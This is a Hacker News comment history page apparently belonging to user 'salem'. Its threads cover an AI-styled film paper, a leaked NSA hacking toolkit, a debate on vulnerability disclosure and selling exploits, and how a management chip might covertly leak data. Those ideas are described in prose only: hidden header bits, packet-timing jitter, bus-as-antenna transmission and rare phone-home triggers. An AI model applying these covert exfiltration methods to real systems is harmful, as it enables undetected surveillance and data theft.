Hacker Newsnew | past | comments | ask | show | jobs | submit | salem's commentslogin

It would be great if phone makers commit to something like this as part of their environmental plans


Who wouldn't love race car battlebots?


Exactly, as the article says, it wouldn't be about the accomplishments of the driver and his/her reflexes and abilities, it would be all about the engineering team, AI, and tech, behind the vehicle! It would be fantastic! But I can see where it wouldn't really fit into "NASCAR" really, it would be more of a sport of its own - like you said, battlebots.


I'd rather see Demolition Derby battlebots.

Heck, I miss the original BattleBots for that matter.


No, they actually did write parts of the paper.

Leaving them out as co-authors would be misconduct.


Source?


The paper is about how to iteratively tweak your rendering pipeline to achieve a certain look. It makes sense that the director of the movie would be involved in that process.


If I tell someone to blur a background during postprocessing, do I also get a coauthor credit on a paper about gaussian photo manipulation?


If the particular blur in question has a unique characteristic, you should push for it, sure.


So, you didn't read the paper, huh?


I did. They describe using a Keras implementation, written by someone else, of style transfer, which was invented by someone else, to achieve a particular artistic effect. They use a pre-trained model. They don't even have to buy any hardware, since they used AWS GPU instances. It's a case study, nothing new has been accomplished here.

Do I also get a Verge writeup if I publish a PDF to arxiv about how I compiled and installed tensorflow? The only reason we're talking about this paper is because the name of a Hollywood actress is on it, and because it has the AI buzzword.

Look at the title: "Kristen Stewart co-authors AI paper". 113 points.

The paper itself was submitted earlier, under its actual title, which does not mention Kristen Stewart: https://news.ycombinator.com/item?id=13443107 6 points! The paper is not very interesting. The only thing that makes it newsworthy is the coauthor.


Is any arXiv preprint more untrustworthy than any other or something [I mean, it's not viXra...]?

I can't help but think it would be degrading to have your name on a paper and it be deemed too advanced to be your responsibility..

You could ask the first author directly, I suppose; https://twitter.com/bhautikj


My question was directed at "salem" who stated "No, they actually did write parts of the paper.". That statement seemed like it should have reasoning behind it...


My source?

I would ask what is the source of that quote? The article no longer contains it.


So it seems the dump contains at least one legit 0-day, and it's been in use for 3 years.


Which does at least HINT that it might be what it claims to be. That's a pretty impressive 0-day which they just gave away as a freebie, who knows what they didn't give away.

I will say we'll never get real confirmation if this was actually stolen from the NSA, but if the other bundle contains a bunch of nice original vulnerabilities people will presume it was.


Washington post got former NSA TAO employees to go on record (anonymously) confirming the leaked toolkit comes from NSA:

https://www.washingtonpost.com/world/national-security/power...


Good. Given that these tools no longer can be considered available only to the NSA, they might start working with vendors to close these particular set of holes.


I wonder how this leak affects their "vulnerabilities equities process".

The publicly available data would suggest that thus-far NSA-hoarded vulnerabilities are definitively known to actors who appear willing to act against US interests.

Vendor disclosure means those vulnerabilities can be patched and US interests can cease being vulnerable, but could also confirm NSA awareness of vulnerabilities - which could in turn cause attribution concerns for past or present operations the NSA is undertaking or has undertaken using these vulnerabilities (in addition to providing additional credibility to the leaker).

What a tangled web.


Worked with the US govt (selling to it) and can tell by browsing those files, there is a high chance it came from a 3 letter US govt agency. It was just by looking at stuff they reference, packages, tools they use. The language and phraseology in comments (excluding bundled software like requests and scapy of course). After many years you start to get a feel for stuff like that.


Yes, I think so, too.


Makes you wonder if they could have made more money by pretending to find them and reporting them to the respective bug bounty programs.


Bug bounties almost never pay market value for exploits. Only reason to participate in them is charity.


And legality. I'm not sure why people seem to entirely discount that portion. There's more reward by selling on the black market, but there's also more risk associated with that.


Yeah. Homeowners don't pay market value for me not robbing them, either. After all, think how much that jewellery is worth. And the damage of ID cards and passports.

A laptop alone could get me $250, but no one wants to give me even $10 for telling them their door is unlocked.


Most people only care about tangibles. When i politely advised about security holes, i was told that "we don't need people like you' or just called the police. I understand.


They discount it because it's not true. Nothing illegal about looking for vulnerabilities in products and being compensated for your findings. It's only illegal to attack someone else's deployment.


What's illegal about selling them? Is there an anti-security-consulting-market legislation?

In general what are some risks invovled (I am just not very familiar and wondering in general). Is it a tax issue, the chance IRS could come after you for undeclared income?


Depending on jurisdiction and the particulars of the sale and who you sold it to, I think it's possible you could be charged as an accomplice if the exploit is used in a crime. For example, if you had any reason to believe the individual or organisation you sold it to might use it illegally, and someone singles you out after they do use it illegally, I don't think it would be hard for a prosecutor to make a case. I also don't think under those particular circumstances that's necessarily a bad thing. IANAL though.


Nothing, there are businesses doing it in the US paying taxes on their income.


> Only reason to participate in them is charity.

Maybe believing that it's good when fewer vulnerabilities exist and when attackers are less able to exploit things? Does that count as charity?


...noun: the voluntary giving of help to those in need.


Getting a CVE on your resume isn't bad either.


> and it's been in use for 3 years.

At least 3 years.


This is why "responsible disclosure" is a joke. The flaws put in by these companies are not responsible. (Sometimes people make mistakes, but we're at the point of carelessness).


That may feel good to say, but as someone whose job it was to find these kinds of bugs in software from companies ranging from tiny startups to financial exchanges to major tech vendors, this is a kind of carelessness shared by virtually everyone shipping any kind of software anywhere.

That said, the term "responsible disclosure" is Orwellian, and you should very much avoid using it.


How is "responsible disclosure" Orwellian?


It's coercive. It redefines language to make any handling of vulnerabilities not condoned by the vendors who shipped those vulnerabilities "irresponsible", despite the fact that third parties who discover vulnerabilities have no formal duty to cooperate with those vendors whatsoever.

The better term is "coordinated disclosure". But uncoordinated disclosure is not intrinsically irresponsible. For instance: if you know there's an exploit in the wild for something, perhaps go ahead and tweet the vulnerability without notice!


Do you think there's a moral imperative for researchers to responsibly disclose discovered vulnerabilities?

I see it as a kind of Hippocratic Oath in the field.


No.


Maybe I don't understand you. Are you suggesting that, if you find a vulnerability in a piece of software, you aren't ethically obligated to confidentially disclose the vulnerability to the maintainer so it can be patched before the vulnerability becomes publicly known? If so, why? What is a person who found a vulnerability ethically obligated to do?


No, of course you aren't. Why would you be?


... because if you don't and someone malicious also discovers this vulnerability they can use it to do bad things? If I can get a vulnerability patched before it can be exploited, I can potentially prevent a hacker from stealing people's identity, credit card numbers, private data, etc. To have that opportunity and not act seems irresponsible.

I must be misunderstanding. Would you mind expanding on this more?


You are not misunderstanding. I do not in the general case have a duty to correct other people's mistakes. The people deploying broken software have a duty to do whatever they can not to allow its flaws to compromise their users and customers. Merely learning something new about the software they use does not transfer that obligation onto me.

I would personally in almost every case report vulnerabilities I discovered. But not in every case (for instance: I refused to report the last CryptoCat flaw I discovered, though I did publicly and repeatedly warn that I'd found something grave). More importantly: my own inclination to report doesn't bind on every other vulnerability researcher.


Well, I'm glad you do report the vulnerabilities you find. Maybe it's my own naive, optimistic worldview, but I profoundly disagree with your stance that a researcher is not obligated to report. I think it is a matter of public safety. If you found out a particular restaurant was selling food with dangerously high levels of lead, aren't you obligated to tell someone, anyone for the public good? If you don't, you aren't as culpable as the restaurant serving this food, but that's still a lot of damage you could have prevented at no real cost to yourself.

I understand morality is subjective, but that's my 2 cents on the matter.

EDIT: about the vulnerabilities you didn't disclose, I really can't understand why not. Why not just send an email to the maintainer: "hey, when I do X I cause a buffer overflow"? You don't even have to help them fix it. You probably won't answer this, but can you tell me why you wouldn't disclose a vulnerability?


I do not report all the vulnerabilities I find, as I just said.

I confess to being a bit mystified as to how work I do on my own time, uncompensated by anyone else, which work does not create new vulnerabilities but instead merely informs me as to their existence, somehow creates an obligation for me to act on behalf of the vendors who managed to create those vulnerabilities in the first place.

Perhaps you have not had the pleasure of trying to report a vulnerability, losing several hours just trying to find the correct place to send the vulnerability, being completely unable to find a channel with which to send the vulnerability without putting the plaintext for it on the Internet in email or some dopey web form, only to get a response from first-line tech support asking for a license or serial number so they can provide customer support.

Clearly, you have not had the experience of being threatened with lawsuits for reporting vulnerabilities --- not in software running on someone else's servers (which, absent a bug bounty, you do not in the US have a legal right to test) but on software you download and run and test on your own machine. I have had that experience.

No. Finding vulnerabilities does not obligate someone to report them. I can understand why you wish it did. But it does not.


I see you point about it being overly difficult to report vulnerabilities, especially legal threats, that seriously sucks. I guess I believe you have an obligation to make some effort to disclose, but if a project is just irresponsible and won't fix their shit, or will try to sue you, it's out of your hands.


Somehow my doing work on my own time creates an obligation for me to do more work on behalf of others.

Can't I just flip this around on you and say you have an ethical obligation to spend some of your time looking for vulnerabilities? If you started looking, you'd find some. Why do you get to free-ride on my work by refusing to scrutinize the stuff you run?


> Somehow my doing work on my own time creates an obligation for me to do more work on behalf of others.

To some small extent, yes, though how much work is up for debate. Maintainer's email and PGP public key is right there on the website? Yeah, I think you're obligated. No email you can find, no way to contact them, or are just outright hostile? No, I think you shouldn't have to deal with that.

But I feel like you agree with that, though maybe not in those exact words. After all, you've had to jump through all kinds of hoops to disclose vulnerabilities, been threatened with lawsuits for doing the right thing, and yet you still practice responsible disclosure in almost every case in spite of the burden of effort and potential risk. Aren't you doing it because you think disclosure is the right think to do? That's all I mean by obligation.

EDIT: sorry, not "responsible disclosure," "cooperative disclosure" or whatever term you want to use for disclosing the vulnerability to the maintainer.


I think it is a matter of degree. Here - not sure how this is handled in other countries - it is a crime if you come across an accident and do not attempt to help. And to me this is obviously not only the right thing to do because it is required by law but because there is a moral obligation to do so.

Nobody has to enter a burning car and risk his life but at least you have to call the emergency service or do whatever you can reasonably do to help. And it really doesn't matter whether you are doing your work delivering packages, whether the accident was the fault of the driver because he was driving intoxicated, if somebody else could also help or whatnot.

Discovering a vulnerability is of cause different in most respects - the danger is less imminent, the vendor may have a larger responsibility and so on. But the basic structure is the same - more or less by accident you end up in a situation where there is a danger and you are in the position to help to make the outcome probably better.

So I think one can not simply dismiss that there might be a moral obligation to disclose a vulnerability to the vendor on just the structure of the situation, one has to either argue that there is also no moral obligation in the accident scenario or argue that the details are sufficiently different that a different action - or no action in this specific case - is the morally correct or at least an morally acceptable action.


Accidents and vulnerabilities are not directly comparable, so a position on vuln disclosure does not necessarily imply a particular position on accident assistance.

I would feel a moral obligation to help mitigate concrete physical harm to victims of an accident. I feel no such obligation to protect against hypothetical threats to computer systems.

Chances are, you recognize similar distinctions; for instance, I doubt you feel obligated to intervene in accidents that pose only minor personal property risks.


That is also my point of view, severity and other factors matter. But that also seems to imply the same thing for vulnerabilities - discovering a remote code execution vulnerability in Windows might warrant a different action than a hidden master password in an obscure forum software no one really used in a decade. The danger is still more abstract but it can still cause real harm to real people.


I would personally disclose RCE in Windows, not least because I think Microsoft does a better-than-average job in dealing with the research community.

But I need to be careful saying things like that, because it is very easy for me to say that, because I don't spend any time looking for those kinds of flaws. Security research is pretty specialized now, and I don't do spare-time Windows work. I might feel differently if I did.

I would not judge the (many) researchers who would not necessarily disclose that flaw immediately.


IF there is a vulnerability, it might already be in use by hackers. People need to know about it immediately, so they can defend themselves (by closing a port, or switching to a different server or something). Companies need to be encouraged to find and fix this kind of thing without waiting for a embarrass them by finding it.


I object strongly to your claim that I practice "responsible disclosure", for the reasons stated earlier in the thread.


There is no such thing as responsible disclosure. The concept is nonsensical. Also, you're overestimating the consequences of a single bug. The boring reality is that bugs rarely matter.


When you say obligation, do you actually mean that? An obligation is enforced by some sort of penalty, either legal (ultimately a threat of violence) or social (public shaming). There is no incentive for meeting an obligation outside of avoiding punishment, so why would individuals and private enterprises do any infosec work?


You assume that your own research machine can't be compromised, nor are the communication channels of the organization at fault.

So, it won't be fixed.

Hopefully only one or two people know about the same flaw you found...

Oh, but you would know ahead of time if concrete physical harm could possibly come to the victim of an accident?

Well good for you! You should probably be in charge of defending all infosec research, since apparently you can't be hacked.


[flagged]


Then you misunderstood your own logical conclusion...

You said (and I quote):

  Can't I just flip this around on you and say
  you have an ethical obligation to spend some
  of your time looking for vulnerabilities?
No. No, you can't. Unless you could convince me that my Dwarf Fortress skills have a similar magnitude of real-world affect as the vulnerabilities I've discovered on my own and decided to pocket for one reason or another.


By your logic, I am better off not doing vulnerability research in my spare time --- as is virtually everybody else. How is that a good outcome?


No. By my logic, you are better off not doing vulnerability research in your spare time if you have to worry about the legal ramifications of your actions.

The ethical conundrums are unavoidable, and those calculations are indeed difficult.

The legal consequences are artifice, and by agreeing to those (while ignoring externalities and not going public), you are likely putting others at risk.


This is a fascinating exchange. Now I wonder how much of the general population, or even the tech-but-not-security population thinks like this.


To your second question: because some projects are fundamentally irresponsible, and providing vulnerability reports to them means making an engineering contribution, which decreases the likelihood that the project will fail.


The meaning of the words "responsible" and "irresponsible" extends beyond "formal duty".


I'm sure that's true, but that's not responsive to my argument.


I obviously thought so otherwise I wouldn't have said it.


The only responsive argument I can come up with based on your original comment depends on you not knowing what the term "responsible disclosure" means, and instead trying to back out its meaning from the individual words "responsible" and "disclosure". But that's not what the term means.

A good shorthand definition for "responsible disclosure" is "report to the vendor, and only to the vendor, and disclose to nobody else until the vendor chooses to release a patch, and even then not until a window of time chosen by the vendor elapses."

Maybe you thought I was saying "the only way to disclose responsibly is to honor a formal duty to the vendors of insecure software". No, that was not my argument. If you thought it was, well, that's a pretty great demonstration of how the term is Orwellian, isn't it?

Or I could be missing part of your argument (it was quite terse, after all). Maybe you could fill in some details.


this is a kind of carelessness shared by virtually everyone shipping any kind of software anywhere.

I don't feel wrong saying that all of those are irresponsible. There are some people who write good code, who at least make an effort to avoid vulnerabilities, and those are the responsible ones.


If you find one of them in the wild, take a picture, so we can have some evidence they exist.


They exist all over the place. OpenBSD, DJB, Knuth, at companies I've worked for, you'll find people who care, and code responsibly. The rest of you need to get your act together.


Someone mentioned selling vulnerabilities on the black market as a better alternative than doing these "responsible disclosure" and bug bounties. What's your take on that? Is it a better route to take?


For the most part I think selling vulnerabilities on an actual "black market" is intrinsically unethical, and makes you a party to the bad things people who buy exploits on an actual black market do with them.

Thankfully, the black market doesn't want 99.99999% of the vulnerabilities people find.

I have friends who have sold vulnerabilities to people other than vendors. I do not think they're unethical people, and I don't know enough about those transactions to really judge them. So, it really depends, I guess. But if it were me, I'd be very careful.


It's dangerous, and might be illegal, so be careful if you decide to do that.


Companies that make bluetooth ODB2 devices and smartphone apps should pay attention to this too.


There were loads of DEC multia workstations selling cheap at some point. But even those where a pain to get booting into linux of FreeBSD.


There was an Apple presentation that claimed lower decompression energy usage:

https://developer.apple.com/videos/play/wwdc2015/712/?time=4...

On an iOS device this is a pretty hot path, since it's used to decompress the asset catalog, including some images, so most of your apps on iOS probably already use this algorithm.


It's called covert channels. It could be done by flipping some unused/ignored bits in ip4/tcp headers in a stream of traffic that goes past a collection point.


But this is still easily visible with wireshark, right? Don't you think we'd have discovered this by now?


How would Wireshark reveal this kind of attack? If the management chip has direct hardware access, it can hide data in innocuous-looking packets that the host machine never sees. You would have to monitor both the packets that the OS thinks it's sending, and the packets actually received by the switch, and constantly compare them for mismatches. Given the performance cost, I find it hard to believe that anyone except the most paranoid organizations would actually do this.

And of course, if you block the obvious exfiltration methods, all you do is force the attacker to do something more creative. Like modulating inter-packet timings, or even sending data to a nearby radio receiver by using the system bus as an antenna.


> How would Wireshark reveal this kind of attack? If the management chip has direct hardware access, it can hide data in innocuous-looking packets that the host machine never sees.

Lots of organizations use various forms of intrusion detection. A network intrusion detection system (NIDS) would be an off-device system which monitors network traffic for suspicious or obviously malicious packets.

It's certainly no guarantee, but somewhere along the line someone probably would have noticed something if these systems were exfiltrating data via the network using something like IPv4 headers. Specifically, a quick look makes it look like Snort (an open source NIDS) may actually be distributed with rules to alert on IPv4 reserved bits being set.


You keep saying that "someone should have noticed something" but as the old adage goes, absence of evidence is not evidence of absence

What you seem to keep missing is that we know from the Snowden leaks that the capability already exists, and NSA has successfully used implants to do data exfil in the past.


"absence of evidence is not evidence of absence"

This isn't true. Absence of evidence is weak evidence of absence, and suggests that it's not the case.

Not disagreeing with anything else in your comment, but that quote completely defies Bayes 101.


There are ways of doing it invisibly. Change timestamps in very subtle ways, Embed data in lossy media formats, etc.

If the code says "phone home if anywhere on the screen you see one of the following email addresses" then it won't show up in a normal security audit, unless you email one of those people during the audit. All the NSA has to do is make the phoning home rare enough that it's probabilisticly unlikely to be observed.


Exfiltration of logged keystrokes and other data is possible through introducing network packet jitter by the ME. This is virtually undetectable.

https://events.ccc.de/congress/2013/Fahrplan/events/5380.htm...


But maybe a better chance of getting away with it


These side-letter deals and exits optimized for founders are probably not legal since they are often not in the best interests of shareholders, but I've never heard of them being investigated.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: